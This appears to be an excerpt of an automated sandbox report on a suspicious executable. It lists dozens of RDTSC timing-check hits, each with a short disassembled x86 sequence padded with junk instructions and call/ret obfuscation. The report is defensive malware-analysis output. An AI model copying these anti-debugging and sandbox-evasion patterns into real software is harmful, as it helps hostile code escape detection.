                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4FA470 second address: 4FA47E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4FA47E second address: 4FA485 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4FC353 second address: 4FC358 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4FC50E second address: 4FC539 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007FE6E8F184BFh 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4FC539 second address: 4FC59A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 popad 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007FE6E8B29088h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 00000018h 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 mov dword ptr [ebp+122D2531h], ebx 0x00000029 cmc 0x0000002a push dword ptr fs:[00000000h] 0x00000031 add ebx, 5DCE54C1h 0x00000037 mov dword ptr fs:[00000000h], esp 0x0000003e sbb bx, 0D8Ah 0x00000043 mov eax, dword ptr [ebp+122D0601h] 0x00000049 pushad 0x0000004a mov bh, DAh 0x0000004c sbb cx, 0831h 0x00000051 popad 0x00000052 push FFFFFFFFh 0x00000054 nop 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a popad 0x0000005b rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4FC59A second address: 4FC5AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4FC5AE second address: 4FC5BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4FC5BF second address: 4FC5C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4FC5C3 second address: 4FC5C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4FF408 second address: 4FF40C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4FF40C second address: 4FF411 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4FF411 second address: 4FF43E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FE6E8F184C6h 0x0000000b jng 00007FE6E8F184B6h 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4FF43E second address: 4FF444 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4FF444 second address: 4FF44C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4FF44C second address: 4FF456 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4FF456 second address: 4FF45C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4FF45C second address: 4FF460 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4FF460 second address: 4FF464 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4FD598 second address: 4FD59E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4B353D second address: 4B3564 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FE6E8F184B6h 0x00000008 jmp 00007FE6E8F184C3h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 js 00007FE6E8F184B6h 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4B3564 second address: 4B3568 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4FD59E second address: 4FD5A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4FFA8D second address: 4FFA9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 jnc 00007FE6E8B29086h 0x0000000f pop esi 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4FFA9D second address: 4FFAA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 4FFAA3 second address: 4FFAA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 500D70 second address: 500D7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FE6E8F184B6h 0x0000000a popad 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 502A81 second address: 502A99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8B29094h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 503A8C second address: 503B20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007FE6E8F184C1h 0x00000015 popad 0x00000016 nop 0x00000017 push 00000000h 0x00000019 push edx 0x0000001a call 00007FE6E8F184B8h 0x0000001f pop edx 0x00000020 mov dword ptr [esp+04h], edx 0x00000024 add dword ptr [esp+04h], 0000001Dh 0x0000002c inc edx 0x0000002d push edx 0x0000002e ret 0x0000002f pop edx 0x00000030 ret 0x00000031 xor bx, 36D6h 0x00000036 push 00000000h 0x00000038 add dword ptr [ebp+12456564h], edi 0x0000003e push 00000000h 0x00000040 push 00000000h 0x00000042 push ebx 0x00000043 call 00007FE6E8F184B8h 0x00000048 pop ebx 0x00000049 mov dword ptr [esp+04h], ebx 0x0000004d add dword ptr [esp+04h], 0000001Bh 0x00000055 inc ebx 0x00000056 push ebx 0x00000057 ret 0x00000058 pop ebx 0x00000059 ret 0x0000005a push esi 0x0000005b or bh, 00000012h 0x0000005e pop edi 0x0000005f xchg eax, esi 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 push edx 0x00000064 jng 00007FE6E8F184B6h 0x0000006a rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 503B20 second address: 503B26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 502CE1 second address: 502D81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 mov dword ptr [ebp+122D1D00h], esi 0x0000000f push edx 0x00000010 mov edi, dword ptr [ebp+122D2BB8h] 0x00000016 pop ebx 0x00000017 push dword ptr fs:[00000000h] 0x0000001e add ebx, 7128DB06h 0x00000024 mov dword ptr fs:[00000000h], esp 0x0000002b mov eax, dword ptr [ebp+122D06F1h] 0x00000031 push 00000000h 0x00000033 push edi 0x00000034 call 00007FE6E8F184B8h 0x00000039 pop edi 0x0000003a mov dword ptr [esp+04h], edi 0x0000003e add dword ptr [esp+04h], 0000001Dh 0x00000046 inc edi 0x00000047 push edi 0x00000048 ret 0x00000049 pop edi 0x0000004a ret 0x0000004b cld 0x0000004c push FFFFFFFFh 0x0000004e push 00000000h 0x00000050 push ebx 0x00000051 call 00007FE6E8F184B8h 0x00000056 pop ebx 0x00000057 mov dword ptr [esp+04h], ebx 0x0000005b add dword ptr [esp+04h], 00000017h 0x00000063 inc ebx 0x00000064 push ebx 0x00000065 ret 0x00000066 pop ebx 0x00000067 ret 0x00000068 jg 00007FE6E8F184BCh 0x0000006e mov edi, ebx 0x00000070 or dword ptr [ebp+122D2AE3h], esi 0x00000076 push eax 0x00000077 je 00007FE6E8F184CDh 0x0000007d push eax 0x0000007e push edx 0x0000007f jmp 00007FE6E8F184BBh 0x00000084 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 503D47 second address: 503D51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FE6E8B29086h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 505A86 second address: 505AF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dword ptr [esp], eax 0x00000007 call 00007FE6E8F184C9h 0x0000000c mov di, dx 0x0000000f pop ebx 0x00000010 pushad 0x00000011 sub dword ptr [ebp+122D31B5h], eax 0x00000017 sub dword ptr [ebp+122D3158h], edx 0x0000001d popad 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push ecx 0x00000025 call 00007FE6E8F184B8h 0x0000002a pop ecx 0x0000002b mov dword ptr [esp+04h], ecx 0x0000002f add dword ptr [esp+04h], 00000017h 0x00000037 inc ecx 0x00000038 push ecx 0x00000039 ret 0x0000003a pop ecx 0x0000003b ret 0x0000003c jns 00007FE6E8F184BBh 0x00000042 mov ebx, edx 0x00000044 push eax 0x00000045 jc 00007FE6E8F184BEh 0x0000004b push edi 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 504D23 second address: 504D27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 505C57 second address: 505C5C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 508067 second address: 5080E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007FE6E8B29088h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 pushad 0x00000023 call 00007FE6E8B29090h 0x00000028 mov dword ptr [ebp+122D212Dh], edx 0x0000002e pop ebx 0x0000002f or dword ptr [ebp+122D3860h], ebx 0x00000035 popad 0x00000036 push 00000000h 0x00000038 sub bl, FFFFFFC6h 0x0000003b push 00000000h 0x0000003d push 00000000h 0x0000003f push ebp 0x00000040 call 00007FE6E8B29088h 0x00000045 pop ebp 0x00000046 mov dword ptr [esp+04h], ebp 0x0000004a add dword ptr [esp+04h], 00000015h 0x00000052 inc ebp 0x00000053 push ebp 0x00000054 ret 0x00000055 pop ebp 0x00000056 ret 0x00000057 mov dword ptr [ebp+1247E58Dh], edi 0x0000005d push eax 0x0000005e pushad 0x0000005f push eax 0x00000060 push edx 0x00000061 push edx 0x00000062 pop edx 0x00000063 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5080E3 second address: 5080E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 508236 second address: 5082B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], eax 0x0000000a sub dword ptr [ebp+122D3865h], eax 0x00000010 push dword ptr fs:[00000000h] 0x00000017 jo 00007FE6E8B2908Ch 0x0000001d mov edi, dword ptr [ebp+12450CC6h] 0x00000023 mov dword ptr fs:[00000000h], esp 0x0000002a mov di, 7511h 0x0000002e mov eax, dword ptr [ebp+122D04EDh] 0x00000034 jmp 00007FE6E8B2908Ch 0x00000039 push FFFFFFFFh 0x0000003b push 00000000h 0x0000003d push eax 0x0000003e call 00007FE6E8B29088h 0x00000043 pop eax 0x00000044 mov dword ptr [esp+04h], eax 0x00000048 add dword ptr [esp+04h], 00000016h 0x00000050 inc eax 0x00000051 push eax 0x00000052 ret 0x00000053 pop eax 0x00000054 ret 0x00000055 nop 0x00000056 push eax 0x00000057 push edx 0x00000058 js 00007FE6E8B2909Fh 0x0000005e jmp 00007FE6E8B29099h 0x00000063 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5082B8 second address: 5082E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007FE6E8F184B8h 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5082E0 second address: 5082E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 5082E6 second address: 5082EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 50EF29 second address: 50EF2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 50E85D second address: 50E86D instructions: 0x00000000 rdtsc 0x00000002 jne 00007FE6E8F184C2h 0x00000008 jo 00007FE6E8F184B6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 50E86D second address: 50E876 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 514882 second address: 514888 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 514888 second address: 5148DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d pop eax 0x0000000e push esi 0x0000000f jmp 00007FE6E8B29096h 0x00000014 pop esi 0x00000015 popad 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a push ecx 0x0000001b push esi 0x0000001c pushad 0x0000001d popad 0x0000001e pop esi 0x0000001f pop ecx 0x00000020 mov eax, dword ptr [eax] 0x00000022 jno 00007FE6E8B29092h 0x00000028 mov dword ptr [esp+04h], eax 0x0000002c pushad 0x0000002d jo 00007FE6E8B29088h 0x00000033 push ecx 0x00000034 pop ecx 0x00000035 push eax 0x00000036 push edx 0x00000037 push esi 0x00000038 pop esi 0x00000039 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 514BA8 second address: 514BCF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c js 00007FE6E8F184B6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 514BCF second address: 514BDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007FE6E8B29086h 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 514BDC second address: 514C11 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push ebx 0x0000000c push eax 0x0000000d jmp 00007FE6E8F184C6h 0x00000012 pop eax 0x00000013 pop ebx 0x00000014 mov eax, dword ptr [eax] 0x00000016 push eax 0x00000017 push edx 0x00000018 jo 00007FE6E8F184BCh 0x0000001e jbe 00007FE6E8F184B6h 0x00000024 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 514C11 second address: 514C35 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FE6E8B2908Eh 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 je 00007FE6E8B29086h 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 514C35 second address: 514C3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FE6E8F184B6h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 514C3F second address: 33EEE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 jmp 00007FE6E8B2908Dh 0x0000000e push dword ptr [ebp+122D0EB9h] 0x00000014 pushad 0x00000015 jmp 00007FE6E8B29091h 0x0000001a add eax, 62F2E408h 0x00000020 popad 0x00000021 call dword ptr [ebp+122D24F1h] 0x00000027 pushad 0x00000028 mov dword ptr [ebp+122D24B3h], esi 0x0000002e xor eax, eax 0x00000030 ja 00007FE6E8B29092h 0x00000036 jnc 00007FE6E8B2908Ch 0x0000003c mov edx, dword ptr [esp+28h] 0x00000040 js 00007FE6E8B2908Ch 0x00000046 mov dword ptr [ebp+122D2950h], edi 0x0000004c mov dword ptr [ebp+122D2950h], ecx 0x00000052 mov dword ptr [ebp+122D2C8Ch], eax 0x00000058 sub dword ptr [ebp+122D24B3h], ecx 0x0000005e mov esi, 0000003Ch 0x00000063 mov dword ptr [ebp+122D2A2Dh], edi 0x00000069 add esi, dword ptr [esp+24h] 0x0000006d pushad 0x0000006e or dword ptr [ebp+122D2A2Dh], ebx 0x00000074 popad 0x00000075 lodsw 0x00000077 jmp 00007FE6E8B29096h 0x0000007c add eax, dword ptr [esp+24h] 0x00000080 add dword ptr [ebp+122D2A2Dh], eax 0x00000086 mov ebx, dword ptr [esp+24h] 0x0000008a cld 0x0000008b push eax 0x0000008c push eax 0x0000008d push edx 0x0000008e jmp 00007FE6E8B2908Ch 0x00000093 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 518B04 second address: 518B0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 518C6B second address: 518C71 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 518C71 second address: 518C83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jng 00007FE6E8F184B6h 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 518DA5 second address: 518DA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 518DA9 second address: 518DAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 518DAD second address: 518DC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FE6E8B29086h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 pop eax 0x00000013 popad 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 518DC1 second address: 518DC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 518DC7 second address: 518DCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 518F1D second address: 518F31 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 js 00007FE6E8F184B6h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007FE6E8F184B6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 518F31 second address: 518F35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 518F35 second address: 518F55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184BFh 0x00000007 jo 00007FE6E8F184B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 518F55 second address: 518F5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FE6E8B29086h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 519112 second address: 519117 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 519462 second address: 519468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 51C496 second address: 51C4BE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jo 00007FE6E8F184B6h 0x00000009 jmp 00007FE6E8F184C6h 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 je 00007FE6E8F184B6h 0x00000017 rdtsc
                  Source: C:\Users\user\Desktop\UyiH4t5dph.exeRDTSC instruction interceptor: First address: 51C4BE second address: 51C4EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jno 00007FE6E8B2908Ch 0x00000011 jbe 00007FE6E8B29092h 0x00000017 js 00007FE6E8B29092h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
